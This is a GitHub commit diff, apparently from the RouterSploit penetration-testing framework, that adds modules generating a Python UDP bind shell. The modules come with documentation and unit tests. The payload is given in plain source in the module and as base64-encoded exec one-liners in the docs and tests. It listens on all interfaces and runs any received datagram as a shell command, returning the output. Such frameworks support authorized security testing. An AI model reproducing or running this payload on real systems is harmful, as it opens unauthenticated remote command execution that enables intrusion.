Adding Python UDP Bind Shell (#457)

bf0f120b · Marcin Bury · GitHub · bc126474 · bf0f120b · bf0f120b
Unverified Commit bf0f120b authored Jun 11, 2018 by Marcin Bury Committed by GitHub Jun 11, 2018
8 changed files
--- a/docs/modules/payloads/cmd/python_bind_udp.md
+++ b/docs/modules/payloads/cmd/python_bind_udp.md
+## Description
+Module generates payload that creates interactive udp bind shell by using python one-liner. 
+## Verification Steps
+  1. Start `./rsf.py`
+  2. Do: `use payloads/cmd/python_bind_udp`
+  3. Do: `set rport 4321`
+  4. Do: `run`
+  5. Module generates python udp bind shell payload
+## Scenarios
+```
+rsf > use payloads/cmd/python_bind_udp
+rsf (Python Bind UDP One-Liner) > set rport 4321
+[+] rport => 4321
+rsf (Python Bind UDP One-Liner) > run
+[*] Running module...
+[*] Generating payload
+python -c "exec('ZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbixQSVBFCmZyb20gc29ja2V0IGltcG9ydCBzb2NrZXQsIEFGX0lORVQsIFNPQ0tfREdSQU0Kcz1zb2NrZXQoQUZfSU5FVCxTT0NLX0RHUkFNKQpzLmJpbmQoKCcwLjAuMC4wJyw0MzIxKSkKd2hpbGUgMToKCWRhdGEsYWRkcj1zLnJlY3Zmcm9tKDEwMjQpCglvdXQ9UG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1QSVBFLHN0ZGVycj1QSVBFKS5jb21tdW5pY2F0ZSgpCglzLnNlbmR0bygnJy5qb2luKFtvdXRbMF0sb3V0WzFdXSksYWRkcikK'.decode('base64'))"
+```
--- a/docs/modules/payloads/python/bind_udp.md
+++ b/docs/modules/payloads/python/bind_udp.md
+## Description
+Module generates payload that creates interactive udp bind shell by using python. 
+## Verification Steps
+  1. Start `./rsf.py`
+  2. Do: `use payloads/python/bind_udp`
+  3. Do: `set rport 4321`
+  4. Do: `run`
+  5. Module generates python udp bind shell payload
+## Scenarios
+```
+rsf > use payloads/python/bind_udp
+rsf (Python Bind UDP) > set rport 4321
+[+] rport => 4321
+rsf (Python Bind UDP) > run
+[*] Running module...
+[*] Generating payload
+exec('ZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbixQSVBFCmZyb20gc29ja2V0IGltcG9ydCBzb2NrZXQsIEFGX0lORVQsIFNPQ0tfREdSQU0Kcz1zb2NrZXQoQUZfSU5FVCxTT0NLX0RHUkFNKQpzLmJpbmQoKCcwLjAuMC4wJyw0MzIxKSkKd2hpbGUgMToKCWRhdGEsYWRkcj1zLnJlY3Zmcm9tKDEwMjQpCglvdXQ9UG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1QSVBFLHN0ZGVycj1QSVBFKS5jb21tdW5pY2F0ZSgpCglzLnNlbmR0bygnJy5qb2luKFtvdXRbMF0sb3V0WzFdXSksYWRkcikK'.decode('base64'))
+```
--- a/routersploit/modules/payloads/cmd/python_bind_udp.py
+++ b/routersploit/modules/payloads/cmd/python_bind_udp.py
+from routersploit.core.exploit import *
+from routersploit.modules.payloads.python.bind_udp import Exploit as PythonBindUDP
+class Exploit(PythonBindUDP):
+    __info__ = {
+        "name": "Python Bind UDP One-Liner",
+        "description": "Creates interactive udp bind shell by using python one-liner.",
+        "authors": (
+            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
+        )
+    }
+    cmd = OptString("python", "Python binary")
+    def generate(self):
+        payload = super(Exploit, self).generate()
+        cmd = '{} -c "{}"'.format(self.cmd, payload)
+        return cmd
--- a/routersploit/modules/payloads/python/bind_udp.py
+++ b/routersploit/modules/payloads/python/bind_udp.py
+from base64 import b64encode
+from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload
+class Exploit(BindTCPPayloadMixin, GenericPayload):
+    __info__ = {
+        "name": "Python Bind UDP",
+        "description": "Creates interactive udp bind shell by using python.",
+        "authors": (
+            "Andre Marques (zc00l)",  # shellpop
+            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
+        ),
+    }
+    def generate(self):
+        payload = (
+            "from subprocess import Popen,PIPE\n" +
+            "from socket import socket, AF_INET, SOCK_DGRAM\n" +
+            "s=socket(AF_INET,SOCK_DGRAM)\n" +
+            "s.bind(('0.0.0.0',{}))\n".format(self.rport) +
+            "while 1:\n"
+            "\tdata,addr=s.recvfrom(1024)\n" +
+            "\tout=Popen(data,shell=True,stdout=PIPE,stderr=PIPE).communicate()\n" +
+            "\ts.sendto(''.join([out[0],out[1]]),addr)\n"
+        )
+        encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
+        return "exec('{}'.decode('base64'))".format(encoded_payload)
--- a/tests/payloads/cmd/__init__.py
+++ b/tests/payloads/cmd/__init__.py
--- a/tests/payloads/cmd/test_python_bind_udp.py
+++ b/tests/payloads/cmd/test_python_bind_udp.py
+from routersploit.modules.payloads.cmd.python_bind_udp import Exploit
+# bind udp payload with rport=4321
+bind_udp = (
+    "python -c \"exec('ZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbixQSVBFCmZyb20gc29ja2V0IGltcG9ydCBzb2NrZXQsIEFGX0lORVQsIFNPQ0tfREdSQU0Kcz1zb2NrZXQoQUZfSU5FVCxTT0NLX0RHUkFNKQpzLmJpbmQoKCcwLjAuMC4wJyw0MzIxKSkKd2hpbGUgMToKCWRhdGEsYWRkcj1zLnJlY3Zmcm9tKDEwMjQpCglvdXQ9UG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1QSVBFLHN0ZGVycj1QSVBFKS5jb21tdW5pY2F0ZSgpCglzLnNlbmR0bygnJy5qb2luKFtvdXRbMF0sb3V0WzFdXSksYWRkcikK'.decode('base64'))\""
+)
+def test_payload_generation():
+    """ Test scenario - payload generation """
+    payload = Exploit()
+    payload.rport = 4321
+    assert payload.generate() == bind_udp
--- a/tests/payloads/python/__init__.py
+++ b/tests/payloads/python/__init__.py
--- a/tests/payloads/python/test_bind_udp.py
+++ b/tests/payloads/python/test_bind_udp.py
+from routersploit.modules.payloads.python.bind_udp import Exploit
+# bind udp payload with rport=4321
+bind_udp = (
+    "exec('ZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbixQSVBFCmZyb20gc29ja2V0IGltcG9ydCBzb2NrZXQsIEFGX0lORVQsIFNPQ0tfREdSQU0Kcz1zb2NrZXQoQUZfSU5FVCxTT0NLX0RHUkFNKQpzLmJpbmQoKCcwLjAuMC4wJyw0MzIxKSkKd2hpbGUgMToKCWRhdGEsYWRkcj1zLnJlY3Zmcm9tKDEwMjQpCglvdXQ9UG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1QSVBFLHN0ZGVycj1QSVBFKS5jb21tdW5pY2F0ZSgpCglzLnNlbmR0bygnJy5qb2luKFtvdXRbMF0sb3V0WzFdXSksYWRkcikK'.decode('base64'))"
+)
+def test_payload_generation():
+    """ Test scenario - payload generation """
+    payload = Exploit()
+    payload.rport = 4321
+    assert payload.generate() == bind_udp